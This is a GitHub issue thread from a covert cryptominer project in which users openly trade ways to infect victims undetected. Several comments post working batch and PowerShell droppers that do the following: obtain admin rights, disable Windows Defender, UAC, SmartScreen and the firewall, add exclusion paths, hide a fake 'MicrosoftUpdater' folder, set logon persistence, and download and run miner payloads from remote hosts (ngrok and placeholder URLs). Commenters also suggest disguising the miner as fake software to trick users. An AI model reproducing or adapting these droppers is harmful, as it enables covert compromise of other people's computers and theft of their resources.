### ISSUE TITLE
Is there any free crypter/obfuscator or method I can use to make my miner FUD (or atleast undetected by Windows Defender)?

### ISSUE THREAD

**Issue by slezercc** [UnamSanctam/SilentCryptoMiner#1283]

**Comment by UnamSanctam** [comment]
Not that I know of, free crypters aren't really common since the developer would need to "remake" it every few days since it would get detected. Especially since it would be free and public, meaning that it would get detected extremely fast. There are some projects on GitHub which could work but they are usually proof of concepts so you'd have to get them working by yourself (which is also why they might still be undetected).

**Comment by iceeburr** [comment]
@UnamSanctam can you please share an example of a fud crypter (or at least one to hide it from windows defender)? I have been looking for one on GitHub and many other websites, but I coudln't find anything that works. Most of the crypters I find make the opposite of what they are supposed to do. (increase malware positives). I'm not really experienced in coding, I coudln't find any blog or post about crypting and how to do it. There are only explanations for people who can already code or people who have made one before. Using the good old WinRar method still works, but it still gets detected and only decreases positives by a few. There are just so much crypters out there that do work, but the creators were too lazy to at least give a proper guide on how to use it or what file types it supports. I've found a lot of "powershell" crypter, which means they were written in powershell code, but no.. All of them only crypt powershell scripts and none of them were written in powershell themselves. Thanks for creating this tool, it looks like a lot fun to mess with. I would really appreciate you if you could share a small guide on how to make a crypter. I don't care if it will only be FUD for a few days. As long as the file runs on the victim's computer he is done for and probably will not even realize he had a silent miner before something unexpected happens. I don't care if I will have to update the crypter every day just so it was not detected, as long as it's FUD and works like intended it will work for me. Once again thank you for your time, have a great day!

**Comment by wnetMC** [comment]
> @UnamSanctam can you please share an example of a fud crypter (or at least one to hide it from windows defender)? I have been looking for one on GitHub and many other websites, but I coudln't find anything that works. Most of the crypters I find make the opposite of what they are supposed to do. (increase malware positives). I'm not really experienced in coding, I coudln't find any blog or post about crypting and how to do it. There are only explanations for people who can already code or people who have made one before. Using the good old WinRar method still works, but it still gets detected and only decreases positives by a few. There are just so much crypters out there that do work, but the creators were too lazy to at least give a proper guide on how to use it or what file types it supports. I've found a lot of "powershell" crypter, which means they were written in powershell code, but no.. All of them only crypt powershell scripts and none of them were written in powershell themselves. Thanks for creating this tool, it looks like a lot fun to mess with. I would really appreciate you if you could share a small guide on how to make a crypter. I don't care if it will only be FUD for a few days. As long as the file runs on the victim's computer he is done for and probably will not even realize he had a silent miner before something unexpected happens. I don't care if I will have to update the crypter every day just so it was not detected, as long as it's FUD and works like intended it will work for me. Once again thank you for your time, have a great day!

I think I found something that could work. It works as a Windows defender disabler, downloads your file and runs it. I'll test it when I get home tonight and I'll give you the full code for it here, it's a batchfile, so its super easy to edit.

**Comment by wnetMC** [comment]
@UnamSanctam If it works, you could add it as an option in the builder.

**Comment by iceeburr** [comment]
I don't think that a "Windows Defender Disabler" is possible without triggering any malware positives. So you want to make a program that disables the defender (or whitelists a certain folder) and works like a downloader for the virus? That is very clever and probably will bait a lot of people. I don't think that the "file run" part is necessary. I have a few suggestions why there should be a runner and why there shouldn't be one.
Why I think making a runner is good:
1. You can make it FUD without having to use the winrar sfx method (or peunion program). Most AVs currently will flag any sfx edited file as a virus no matter the content. Even if it's just an image.
2. You can esentially make a fake program (for ex: nitro generator). You make the program real, so the user can actually use it, but he won't be aware of the miner, and will not have suspicion of it. You can just grab some old nitro generator from github, change the credits so it looks more real (so it looks like you made it). Paste it in, and done. U don't have to do anything special.
3.  It's just going to be easier to trick the person into not thinking there is a miner behind all of this.
Why I think making a runner is bad:
1. If the miner fails for some reason or gives an unexpected error, the user will instantly know there's something off.
2. In a case he is really unaware of the virus and doesn't want to run it instantly (he waits a few days for example) he will not gain suspicion of the miner because it will not work before you open the file. I don't think that is something that noticable so this is not really a good argument of why making a runner is bad.
Clearly, making a runner only has advantages. I will be really happy to see your program work. I really hope it is possible to trick an AV to whitelist a folder without admin permission. (Most people click yes on the admin rights so I doubt there will be people who will not run it, also a .bat file is literally open source and he can just see the code inside, ofc you will have to obfuscate the windows defender parts, but judging by most people's average brain size I don't think someone will even try opening the source code. Just tell them notepad can't open it XD)

**Comment by iceeburr** [comment]
Hey there @wnetMC , again. We haven't heard from you, I hope you are still here and that  you are going to post about this. I did my research and found this video: https://www.youtube.com/watch?v=ZCV1Wx3Qugg
It turns out that you can do it. The tricky part is that you need admin rights. It seems like this method is 100% working and FUD and it will never get patched. (except mirosoft actually removes access to reg keys from powershell scripts)
I hope this will help others while we are waiting for your reply. It was scary easy to do this actaully. I'm really surprised microsoft still did nothing about it.

**Comment by wnetMC** [comment]
> Hey there @wnetMC , again. We haven't heard from you, I hope you are still here and that you are going to post about this. I did my research and found this video: https://www.youtube.com/watch?v=ZCV1Wx3Qugg It turns out that you can do it. The tricky part is that you need admin rights. It seems like this method is 100% working and FUD and it will never get patched. (except mirosoft actually removes access to reg keys from powershell scripts) I hope this will help others while we are waiting for your reply. It was scary easy to do this actaully. I'm really surprised microsoft still did nothing about it.

Hello, so I watched your video and it seems like this is not a very reliable exploit, some computers may not have any exclusions so I'd prefer not relying on that. For me, it turns out my method is detected by Windows Defender. I'll try rewriting it to make it FUD again. so far this is what I have:

`@echo off

title Castlemania Installer
:: BatchGotAdmin
::-----------------------------------------
REM  --> CheckING for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    echo Requesting administrative privileges...
    goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params = %*:"="
    echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"

    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
    exit /B

:gotAdmin

echo  Extracting Castlemania game assets, please wait...

color 0a

cd  %temp%

bitsadmin/transfer Explorers /download /priority FOREGROUND **https://NSudofileurl.com/NSudo.exe** %temp%\NSudo.exe

set pop=%systemroot%

NSudo -U:T -ShowWindowMode:Hide icacls "%pop%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18

NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System"  /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f

NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration"  /v "Notification_Suppress" /t REG_DWORD /d "1" /f

NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f

NSudo -U:T -ShowWindowMode:Hide  sc stop  windefend  

NSudo -U:T -ShowWindowMode:Hide  sc delete  windefend  

powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""

NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No

NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures

powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Windows\System32'"

powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

powershell.exe -command "Set-MpPreference -PUAProtection disable"

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
      
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

powershell.exe -command "netsh advfirewall set allprofiles state off"

cd C:\Windows\System32

bitsadmin /transfer Packages /download /priority foreground **https://yourinstalleurlhere.com/file.exe** "C:\Windows\System32\chromeupdate.exe"

powershell -command "start chromeupdate.exe"`

**Comment by wnetMC** [comment]
Okay so I just found something that could work.

```REM --add the following to the top of your bat file--


@echo off

:: BatchGotAdmin
:-------------------------------------
REM  --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    echo Requesting administrative privileges...
    goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params = %*:"=""
    echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"

    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
    exit /B

:gotAdmin
    pushd "%CD%"
    CD /D "%~dp0"
:--------------------------------------
Powershell -Command "Set-MpPreference -ExclusionExtension exe"
cd %TEMP%
Powershell -Command "Invoke-Webrequest 'https://b18c-37-236-175-20.ngrok.io/warzone.exe' -OutFile mod.exe"
mod.exe```

**Comment by wnetMC** [comment]
I just tested the bypass and it works wonderfully well! All you need to do is replace the `https://b18c-37-236-175-20.ngrok.io/warzone.exe` URL with your file.

@UnamSanctam if you want to add this as a feature, it could be cool, you could name it FUD Downloader or Windows Defender Bypass, with an input field where the user enters their file URL.

**Comment by iceeburr** [comment]
Hey there! I'm glad you could make it. It looks pretty clean. I have one question left though. Can I use Discord as the file link? I don't know what ngrok.io is, it looks like a popular website for file sharing. Thanks for making this. I will test it once I figure out how to change the link properly.

**Comment by Chainski** [comment]
> 

This is a good method but I saw where I could add a few tweaks, Here's my POC Script below.

`
@echo off

:: BatchGotAdmin
:-------------------------------------
REM  --> Check for permissions
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    echo Requesting administrative privileges...
    goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params = %*:"=""
    echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"

    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
    exit /B

:gotAdmin
    pushd "%CD%"
    CD /D "%~dp0"
:--------------------------------------

REM - We create a hidden folder and exlcude it from Windows Defender as shown below, you can rename the created folder to anything you want.
REM - Added tweaks to redirect all outputs to null to make everything hidden

md %localappdata%\MicrosoftUpdater && attrib +s +h +r %localappdata%\MicrosoftUpdater 2> nul
cd %localappdata%\MicrosoftUpdater 2> nul
Powershell -Command "Add-MpPreference -ExclusionPath %localappdata%\MicrosoftUpdater" 2> nul

REM - Finally we drop our file to the created folder and it will automatically start elevated. 
REM - Added a few tweaks so victim doesn't see the powershell webrequest stream.

Powershell -Command "$ProgressPreference = 'SilentlyContinue';Invoke-Webrequest 'https://127.0.0.1/miner.exe' -OutFile miner.exe" 
miner.exe

`

**Comment by iceeburr** [comment]
@Chainski is this FUD? Also once again I'm asking how to change the link. I don't understand anything. I never did any code on powershell before, I couldn't find anything about the Invoke-Webrequest and how to use it. Can you please explain? Thanks in advance!

**Comment by wnetMC** [comment]
> @Chainski is this FUD? Also once again I'm asking how to change the link. I don't understand anything. I never did any code on powershell before, I couldn't find anything about the Invoke-Webrequest and how to use it. Can you please explain? Thanks in advance!

You need to have a webserver, I use replit.com to run my web panel and to host my installer file. you need to create a PHP Web Server repl and name it whatever you want, then the url for your server will be replname.yourusername.repl.co . You need to set the link in the bypass to: https://replname.yourusername.repl.co/minefile.exe

**Comment by wnetMC** [comment]
I am going to be making a repository for the bypass and contributions will be open, I will also be documenting it and making a tutorial on how to setup everything.

**Comment by Chainski** [comment]
> @Chainski is this FUD? Also once again I'm asking how to change the link. I don't understand anything. I never did any code on powershell before, I couldn't find anything about the Invoke-Webrequest and how to use it. Can you please explain? Thanks in advance!

Not really but just for you to understand the basics. You could just code everything in powershell and make a oneliner bat dropper as shown below, where the oneliner would download the elevated ps1 dropper & run it in memory but that might be too complicated for you. The bat dropper is actually 100% FUD for now. Hope this helps. 

Examples below

1. The BAT dropper (downloads the hosted bypasser below)
```
@echo off
powershell IEX (New-Object Net.Webclient).DownloadString("https://127.0.0.1/bypasser.ps1")

```

3. The bypasser (can be hosted on a web server & downloaded with the dropper above) 

```
if (!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs; exit }

$ErrorActionPreference = 'SilentlyContinue'
$ProgressPreference = 'SilentlyContinue'

# We create the folder ,add the necessary attributes and exclusions

New-Item $env:localappdata\MicrosoftUpdater -type directory -force > $null
cd $env:localappdata\MicrosoftUpdater > $null
$miner=Get-Item $env:localappdata\MicrosoftUpdater -Force
$miner.attributes='Hidden','System','ReadOnly' 
Add-MpPreference -ExclusionPath $env:localappdata\MicrosoftUpdater > $null

# This will run the dropped file when the victim starts their computer, this can be removed if you already have persistence/startup enabled in your miner.

schtasks /create /f /sc onlogon /rl highest /tn "MicrosoftUpdater" /tr $env:localappdata\MicrosoftUpdater\miner.exe > $null

# Let's drop the payload
Invoke-Webrequest 'https://127.0.0.1/miner.exe' -OutFile miner.exe > $null

# Let's Run the miner
$miner=$env:localappdata+'\MicrosoftUpdater\miner.exe'
$launch=[System.Diagnostics.Process]::Start($miner)


```

**Comment by wnetMC** [comment]
You could use that as well. I made the repository: https://github.com/wnetMC/Windows-Defender-Bypass

**Comment by Chainski** [comment]
> You could use that as well. I made the repository: https://github.com/wnetMC/Windows-Defender-Bypass

Good repo for noobs , but its best to create a folder where you will drop the miner then add a permanent exclusion to it instead of removing the exclusion in the end as windows defender may find the miner

**Comment by wnetMC** [comment]
> > You could use that as well. I made the repository: https://github.com/wnetMC/Windows-Defender-Bypass
> 
> Good repo for noobs , but its best to create a folder where you will drop the miner then add a permanent exclusion to it instead of removing the exclusion in the end as windows defender may find the miner

Good repo for noobs? You're creating an exclusion for literally 0 reason buddy. The miner already does it AND there is a watchdog to prevent anyone or anything from tampering with the miner.

**Comment by Chainski** [comment]
> > > You could use that as well. I made the repository: https://github.com/wnetMC/Windows-Defender-Bypass
> > 
> > 
> > Good repo for noobs , but its best to create a folder where you will drop the miner then add a permanent exclusion to it instead of removing the exclusion in the end as windows defender may find the miner
> 
> Good repo for noobs? You're creating an exclusion for literally 0 reason buddy. The miner already does it AND there is a watchdog to prevent anyone or anything from tampering with the miner.

Ok like i said earlier those features can be removed its clearly optional.
